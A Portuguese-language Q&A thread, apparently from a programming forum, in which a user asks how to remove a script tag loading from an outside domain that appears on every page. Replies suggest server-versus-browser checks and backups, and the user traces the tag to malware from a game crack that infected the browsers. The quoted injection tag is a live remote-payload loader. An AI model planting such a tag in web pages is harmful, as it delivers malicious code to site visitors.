# Código malicioso em todas as páginas

Tags: php, script, cpanel

Olá, fui acessar o cPanel e vi pelo navegador que algum script estava sendo carregado de outro site. Ao ver o código fonte, me deparei com o seguinte código:

```
<script src='http://grugol.com/prog/landing.php?app=MjAtODktODQtMEMtOTktMTQ=&partner=200'></script>
```

Ele aparece em todas as páginas do site, em todos os sites hospedados naquela conta do cPanel, e até mesmo no próprio cpanel, file manager. Como posso removê-lo?

Comment: Acesse todos os arquivos e remova.
O site foi invadido, com certeza!

Comment: cara, acabei de descobrir o que era, eu uso um crack pra CS GO e esse crack estava rodando o processo viva.exe que estava infectando as paginas

Answer (score 1):

Primeiro você tem que se certificar que é no servidor ou em seu navegador. Se acessar o código fonte pelo navegador, há grande chance de ser apenas seu browser, ou seja, seu PC, já se acessar o código fonte no FTP em um editor de texto e ver esse script, significa que o site foi invadido.

Primeiro você deve analisar os logs e rever a segurança de seu site e se possível alterar as senhas. É recomendável resolver o problema que causou essa invasão, pois poderá acontecer novamente.

Restaure um backup mais recente, caso não tenha retire o site do ar até que o problema possa ser resolvido.

Não há método mágico para desfazer a invasão, apenas restaurando backup ou rever todo o código em busca de alterações.

E lembre-se que será necessário descobrir a causa, ou você será invadido novamente.

Comment: Olá, obrigado pela resposta. Todas as páginas abertas em qualquer navegador do PC carregam esse código. O que posso fazer para retirar esse código? Formatar a máquina?

Comment: Você checou o código fonte dos arquivos num FTP? Se os arquivos lá do FTP estiverem infectados, então não é a maquina, mesmo assim deve investigar as causas do problema.

Comment: Eu acredito que são os navegadores pois quando eu acesso qualquer site com Firefox ou Chrome (globo.com por ex), o mesmo código aparece. Agora quando eu acesso qualquer site (inclusive os meus) pelo Microsoft Edge, não aparece nada no código fonte.

Comment: @SobreFutebol então são os seus navegadores que estão infetados e não o seu servidor.